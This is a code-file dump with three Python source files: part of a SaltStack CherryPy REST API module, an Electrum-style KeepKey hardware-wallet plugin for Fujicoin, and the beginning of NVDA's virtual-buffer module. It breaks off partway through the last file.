"logout": Logout,
"token": Token,
"minions": Minions,
"run": Run,
"jobs": Jobs,
"keys": Keys,
"events": Events,
"stats": Stats,
}
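# For example, with the default map a request to /minions is routed to the
# Minions class, and the MethodDispatcher configured in get_conf() below
# dispatches it to that class's method matching the HTTP verb (GET, POST, ...).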
def _setattr_url_map(self):
"""
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
"""
if self.apiopts.get("enable_sessions", True) is False:
url_blacklist = ["login", "logout", "minions", "jobs"]
else:
url_blacklist = []
urls = (
(url, cls) for url, cls in self.url_map.items() if url not in url_blacklist
)
for url, cls in urls:
setattr(self, url, cls())
def _update_url_map(self):
"""
Assemble any dynamic or configurable URLs
"""
if HAS_WEBSOCKETS:
self.url_map.update({"ws": WebsocketEndpoint})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update(
{self.apiopts.get("webhook_url", "hook").lstrip("/"): Webhook}
)
# Enable the single-page JS app URL.
self.url_map.update({self.apiopts.get("app_path", "app").lstrip("/"): App})
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.apiopts = cherrypy.config["apiopts"]
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
"""
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
"""
conf = {
"global": {
"server.socket_host": self.apiopts.get("host", "0.0.0.0"),
"server.socket_port": self.apiopts.get("port", 8000),
"server.thread_pool": self.apiopts.get("thread_pool", 100),
"server.socket_queue_size": self.apiopts.get("queue_size", 30),
"max_request_body_size": self.apiopts.get(
"max_request_body_size", 1048576
),
"debug": self.apiopts.get("debug", False),
"log.access_file": self.apiopts.get("log_access_file", ""),
"log.error_file": self.apiopts.get("log_error_file", ""),
},
"/": {
"request.dispatch": cherrypy.dispatch.MethodDispatcher(),
"tools.trailing_slash.on": True,
"tools.gzip.on": True,
"tools.html_override.on": True,
"tools.cors_tool.on": True,
},
}
if salt.utils.versions.version_cmp(cherrypy.__version__, "12.0.0") < 0:
# CherryPy >= 12.0 no longer supports "timeout_monitor", only set
# this config option when using an older version of CherryPy.
# See Issue #44601 for more information.
conf["global"]["engine.timeout_monitor.on"] = self.apiopts.get(
"expire_responses", True
)
if cpstats and self.apiopts.get("collect_stats", False):
conf["/"]["tools.cpstats.on"] = True
if "favicon" in self.apiopts:
conf["/favicon.ico"] = {
"tools.staticfile.on": True,
"tools.staticfile.filename": self.apiopts["favicon"],
}
if self.apiopts.get("debug", False) is False:
conf["global"]["environment"] = "production"
# Serve static media if the directory has been set in the configuration
if "static" in self.apiopts:
conf[self.apiopts.get("static_path", "/static")] = {
"tools.staticdir.on": True,
"tools.staticdir.dir": self.apiopts["static"],
}
# Add to global config
cherrypy.config.update(conf["global"])
return conf
def get_app(opts):
"""
Returns a WSGI app and a configuration dictionary
"""
apiopts = opts.get(__name__.rsplit(".", 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config["saltopts"] = opts
cherrypy.config["apiopts"] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
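# A hedged usage sketch (not part of this module): one way the returned app
# could be mounted with CherryPy directly. ``salt.config.client_config`` and
# the ``root_prefix`` option reflect typical salt-api setups and should be
# treated as assumptions here.
#
#     import salt.config
#     opts = salt.config.client_config('/etc/salt/master')
#     root, apiopts, cpyopts = get_app(opts)
#     cherrypy.quickstart(root, apiopts.get('root_prefix', '/'), cpyopts)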
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum.bip32 import deserialize_xpub
from electrum import constants
from electrum.i18n import _
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = keepkeylib.transport_hid.DEVICE_IDS
self.device_manager().register_devices(self.DEVICE_IDS)
self.libraries_available = True
except ImportError:
self.libraries_available = False
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def create_client(self, device, handler):
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Fujicoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = self.types.HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.get_keepkey_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.get_keepkey_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
__init__.py
|
# -*- coding: UTF-8 -*-
#virtualBuffers/__init__.py
#A part of NonVisual Desktop Access (NVDA)
#This file is covered by the GNU General Public License.
#See the file COPYING for more details.
#Copyright (C) 2007-2017 NV Access Limited, Peter Vágner
import time
import threading
import ctypes
import collections
import itertools
import weakref
import wx
import review
import NVDAHelper
import XMLFormatting
import scriptHandler
from scriptHandler import isScriptWaiting, willSayAllResume
import speech
import NVDAObjects
import api
import sayAllHandler
import controlTypes
import textInfos.offsets
import config
import cursorManager
import browseMode
import gui
import eventHandler
import braille
import queueHandler
from logHandler import log
import ui
import aria
import nvwave
import treeInterceptorHandler
import watchdog
VBufStorage_findDirection_forward=0
VBufStorage_findDirection_back=1
VBufStorage_findDirection_up=2
VBufRemote_nodeHandle_t=ctypes.c_ulonglong
class VBufStorage_findMatch_word(unicode):
pass
VBufStorage_findMatch_notEmpty = object()
FINDBYATTRIBS_ESCAPE_TABLE = {
# Symbols that are escaped in the attributes string.
ord(u":"): ur"\\:",
ord(u";"): ur"\\;",
ord(u"\\"): u"\\\\\\\\",
}
# Symbols that must be escaped for a regular expression.
FINDBYATTRIBS_ESCAPE_TABLE.update({(ord(s), u"\\" + s) for s in u"^$.*+?()[]{}|"})
def _prepareForFindByAttributes(attribs):
escape = lambda text: unicode(text).translate(FINDBYATTRIBS_ESCAPE_TABLE)
reqAttrs = []
regexp = []
if isinstance(attribs, dict):
# Single option.
attribs = (attribs,)
# All options will match against all requested attributes,
# so first build the list of requested attributes.
for option in attribs:
for name in option:
reqAttrs.append(unicode(name))
# Now build the regular expression.
for option in attribs:
optRegexp = []
for name in reqAttrs:
optRegexp.append("%s:" % escape(name))
values = option.get(name)
if not values:
# The value isn't tested for this attribute, so match any (or no) value.
optRegexp.append(r"(?:\\;|[^;])*;")
elif values[0] is VBufStorage_findMatch_notEmpty:
# There must be a value for this attribute.
optRegexp.append(r"(?:\\;|[^;])+;")
elif isinstance(values[0], VBufStorage_findMatch_word):
# Assume all are word matches.
optRegexp.append(r"(?:\\;|[^;])*\b(?:")
optRegexp.append("|".join(escape(val) for val in values))
optRegexp.append(r")\b(?:\\;|[^;])*;")
else:
# Assume all are exact matches or None (must not exist).
optRegexp.append("(?:" )
optRegexp.append("|".join((escape(val)+u';') if val is not None else u';' for val in values))
optRegexp.append(")")
regexp.append("".join(optRegexp))
return u" ".join(reqAttrs), u"|".join(regexp)
class VirtualBufferQuickNavItem(browseMode.TextInfoQuickNavItem):
def __init__(self,itemType,document,vbufNode,startOffset,endOffset):
textInfo=document.makeTextInfo(textInfos.offsets.Offsets(startOffset,endOffset))
super(VirtualBufferQuickNavItem,self).__init__(itemType,document,textInfo)
docHandle=ctypes.c_int()
ID=ctypes.c_int()
NVDAHelper.localLib.VBuf_getIdentifierFromControlFieldNode(document.VBufHandle, vbufNode, ctypes.byref(docHandle), ctypes.byref(ID))
self.vbufFieldIdentifier=(docHandle.value,ID.value)
self.vbufNode=vbufNode
@property
def obj(self):
return self.document.getNVDAObjectFromIdentifier(*self.vbufFieldIdentifier)
@property
def label(self):
attrs = {}
def propertyGetter(prop):
if not attrs:
# Lazily fetch the attributes the first time they're needed.
# We do this because we don't want to do this if they're not needed at all.
attrs.update(self.textInfo._getControlFieldAttribs(self.vbufFieldIdentifier[0], self.vbufFieldIdentifier[1]))
return attrs.get(prop)
return self._getLabelForProperties(propertyGetter)
def isChild(self,parent):
if self.itemType == "heading":
try:
if (int(self.textInfo._getControlFieldAttribs(self.vbufFieldIdentifier[0], self.vbufFieldIdentifier[1])["level"])
> int(parent.textInfo._getControlFieldAttribs(parent.vbufFieldIdentifier[0], parent.vbufFieldIdentifier[1])["level"])):
return True
except (KeyError, ValueError, TypeError):
return False
return super(VirtualBufferQuickNavItem,self).isChild(parent)
class VirtualBufferTextInfo(browseMode.BrowseModeDocumentTextInfo,textInfos.offsets.OffsetsTextInfo):
allowMoveToOffsetPastEnd=False #: no need for end insertion point as vbuf is not editable.
UNIT_CONTROLFIELD = "controlField"
UNIT_FORMATFIELD = "formatField"
def _getControlFieldAttribs(self, docHandle, id):
info = self.copy()
info.expand(textInfos.UNIT_CHARACTER)
for field in reversed(info.getTextWithFields()):
if not (isinstance(field, textInfos.FieldCommand) and field.command == "controlStart"):
# Not a control field.
continue
attrs = field.field
if int(attrs["controlIdentifier_docHandle"]) == docHandle and int(attrs["controlIdentifier_ID"]) == id:
return attrs
raise LookupError
def _getFieldIdentifierFromOffset(self, offset):
startOffset = ctypes.c_int()
endOffset = ctypes.c_int()
docHandle = ctypes.c_int()
ID = ctypes.c_int()
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_locateControlFieldNodeAtOffset(self.obj.VBufHandle, offset, ctypes.byref(startOffset), ctypes.byref(endOffset), ctypes.byref(docHandle), ctypes.byref(ID),ctypes.byref(node))
if not any((docHandle.value, ID.value)):
raise LookupError("Neither docHandle nor ID found for offset %d" % offset)
return docHandle.value, ID.value
def _getOffsetsFromFieldIdentifier(self, docHandle, ID):
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_getControlFieldNodeWithIdentifier(self.obj.VBufHandle, docHandle, ID,ctypes.byref(node))
if not node:
raise LookupError
start = ctypes.c_int()
end = ctypes.c_int()
NVDAHelper.localLib.VBuf_getFieldNodeOffsets(self.obj.VBufHandle, node, ctypes.byref(start), ctypes.byref(end))
return start.value, end.value
def _getPointFromOffset(self,offset):
o = self._getNVDAObjectFromOffset(offset)
if not o.location:
raise LookupError
left, top, width, height = o.location
return textInfos.Point(left + width / 2, top + height / 2)
def _getNVDAObjectFromOffset(self,offset):
try:
docHandle,ID=self._getFieldIdentifierFromOffset(offset)
except LookupError:
log.debugWarning("Couldn't get NVDAObject from offset %d" % offset)
return None
return self.obj.getNVDAObjectFromIdentifier(docHandle,ID)
def _getOffsetsFromNVDAObjectInBuffer(self,obj):
docHandle,ID=self.obj.getIdentifierFromNVDAObject(obj)
return self._getOffsetsFromFieldIdentifier(docHandle,ID)
def _getOffsetsFromNVDAObject(self, obj):
while True:
try:
return self._getOffsetsFromNVDAObjectInBuffer(obj)
except LookupError:
pass
# Interactive list/combo box/tree view descendants aren't rendered into the buffer, even though they are still considered part of it.
# Use the container in this case.
obj = obj.parent
if not obj or obj.role not in (controlTypes.ROLE_LIST, controlTypes.ROLE_COMBOBOX, controlTypes.ROLE_GROUPING, controlTypes.ROLE_TREEVIEW, controlTypes.ROLE_TREEVIEWITEM):
break
raise LookupError
def __init__(self,obj,position):
self.obj=obj
super(VirtualBufferTextInfo,self).__init__(obj,position)
def _getSelectionOffsets(self):
start=ctypes.c_int()
end=ctypes.c_int()
NVDAHelper.localLib.VBuf_getSelectionOffsets(self.obj.VBufHandle,ctypes.byref(start),ctypes.byref(end))
return start.value,end.value
def _setSelectionOffsets(self,start,end):
NVDAHelper.localLib.VBuf_setSelectionOffsets(self.obj.VBufHandle,start,end)
def _getCaretOffset(self):
return self._getSelectionOffsets()[0]
def _setCaretOffset(self,offset):
return self._setSelectionOffsets(offset,offset)
def _getStoryLength(self):
return NVDAHelper.localLib.VBuf_getTextLength(self.obj.VBufHandle)
def _getTextRange(self,start,end):
if start==end:
return u""
return NVDAHelper.VBuf_getTextInRange(self.obj.VBufHandle,start,end,False) or u""
def _getPlaceholderAttribute(self, attrs, placeholderAttrsKey):
"""Gets the placeholder attribute to be used.
@return: The placeholder attribute when there is no content within the ControlField.
None when the ControlField has content.
@note: The content is considered empty if it holds a single space.
"""
placeholder = attrs.get(placeholderAttrsKey)
# For efficiency, only check if it is valid to return placeholder when we have a placeholder value to return.
if not placeholder:
return None
# Get the start and end offsets for the field. This can be used to check if the field has any content.
try:
start, end = self._getOffsetsFromFieldIdentifier(
int(attrs.get('controlIdentifier_docHandle')),
int(attrs.get('controlIdentifier_ID')))
except (LookupError, ValueError):
log.debugWarning("unable to get offsets used to fetch content")
return placeholder
else:
valueLen = end - start
if not valueLen: # value is empty, use placeholder
return placeholder
# Because fetching the content of the field could result in a large amount of text,
# we only do it in order to check for a space.
# We first compare the length using the offsets; only if the length is less than 2
# (i.e. it could hold just a space) do we fetch the text itself.
if valueLen < 2:
controlFieldText = self.obj.makeTextInfo(textInfos.offsets.Offsets(start, end)).text
if not controlFieldText or controlFieldText == ' ':
return placeholder
return None
def _getFieldsInRange(self,start,end):
text=NVDAHelper.VBuf_getTextInRange(self.obj.VBufHandle,start,end,True)
if not text:
return ""
commandList=XMLFormatting.XMLTextParser().parse(text)
for index in xrange(len(commandList)):
if isinstance(commandList[index],textInfos.FieldCommand):
field=commandList[index].field
if isinstance(field,textInfos.ControlField):
commandList[index].field=self._normalizeControlField(field)
elif isinstance(field,textInfos.FormatField):
commandList[index].field=self._normalizeFormatField(field)
return commandList
def getTextWithFields(self,formatConfig=None):
start=self._startOffset
end=self._endOffset
if start==end:
return ""
return self._getFieldsInRange(start,end)
def _getWordOffsets(self,offset):
#Use VBuf_getLineOffsets without screen layout to find out the range of the current field
lineStart=ctypes.c_int()
lineEnd=ctypes.c_int()
NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,0,False,ctypes.byref(lineStart),ctypes.byref(lineEnd))
word_startOffset,word_endOffset=super(VirtualBufferTextInfo,self)._getWordOffsets(offset)
return (max(lineStart.value,word_startOffset),min(lineEnd.value,word_endOffset))
def _getLineOffsets(self,offset):
lineStart=ctypes.c_int()
lineEnd=ctypes.c_int()
NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,config.conf["virtualBuffers"]["maxLineLength"],config.conf["virtualBuffers"]["useScreenLayout"],ctypes.byref(lineStart),ctypes.byref(lineEnd))
return lineStart.value,lineEnd.value
def _getParagraphOffsets(self,offset):
lineStart=ctypes.c_int()
lineEnd=ctypes.c_int()
NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,0,True,ctypes.byref(lineStart),ctypes.byref(lineEnd))
return lineStart.value,lineEnd.value
def _normalizeControlField(self,attrs):
tableLayout=attrs.get('table-layout')
if tableLayout:
attrs['table-layout']=tableLayout=="1"
# convert some table attributes to ints
for attr in ("table-id","table-rownumber","table-columnnumber","table-rowsspanned","table-columnsspanned"):
attrVal=attrs.get(attr)
if attrVal is not None:
attrs[attr]=int(attrVal)
isHidden=attrs.get('isHidden')
if isHidden:
attrs['isHidden']=isHidden=="1"
# Handle table row and column headers.
for axis in "row", "column":
attr = attrs.pop("table-%sheadercells" % axis, None)
if not attr:
continue
cellIdentifiers = [identifier.split(",") for identifier in attr.split(";") if identifier]
# Get the text for the header cells.
textList = []
for docHandle, ID in cellIdentifiers:
try:
start, end = self._getOffsetsFromFieldIdentifier(int(docHandle), int(ID))
except (LookupError, ValueError):
continue
textList.append(self.obj.makeTextInfo(textInfos.offsets.Offsets(start, end)).text)
attrs["table-%sheadertext" % axis] = "\n".join(textList)
if attrs.get("landmark") == "region" and not attrs.get("name"):
# We only consider region to be a landmark if it has a name.
del attrs["landmark"]
# Expose a unique ID on the controlField for quick and safe comparison using the virtualBuffer field's docHandle and ID
docHandle=attrs.get('controlIdentifier_docHandle')
ID=attrs.get('controlIdentifier_ID')
if docHandle is not None and ID is not None:
attrs['uniqueID']=(docHandle,ID)
return attrs
def _normalizeFormatField(self, attrs):
strippedCharsFromStart = attrs.get("strippedCharsFromStart")
if strippedCharsFromStart is not None:
assert strippedCharsFromStart.isdigit(), "strippedCharsFromStart isn't a digit, %r" % strippedCharsFromStart
attrs["strippedCharsFromStart"] = int(strippedCharsFromStart)
return attrs
def _getLineNumFromOffset(self, offset):
return None
def _get_fieldIdentifierAtStart(self):
return self._getFieldIdentifierFromOffset( self._startOffset)
def _getUnitOffsets(self, unit, offset):
if unit == self.UNIT_CONTROLFIELD:
startOffset=ctypes.c_int()
endOffset=ctypes.c_int()
docHandle=ctypes.c_int()
ID=ctypes.c_int()
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_locateControlFieldNodeAtOffset(self.obj.VBufHandle,offset,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(docHandle),ctypes.byref(ID),ctypes.byref(node))
return startOffset.value,endOffset.value
elif unit == self.UNIT_FORMATFIELD:
startOffset=ctypes.c_int()
endOffset=ctypes.c_int()
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_locateTextFieldNodeAtOffset(self.obj.VBufHandle,offset,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(node))
return startOffset.value,endOffset.value
return super(VirtualBufferTextInfo, self)._getUnitOffsets(unit, offset)
def _get_clipboardText(self):
# Blocks should start on a new line, but they don't necessarily have an end of line indicator.
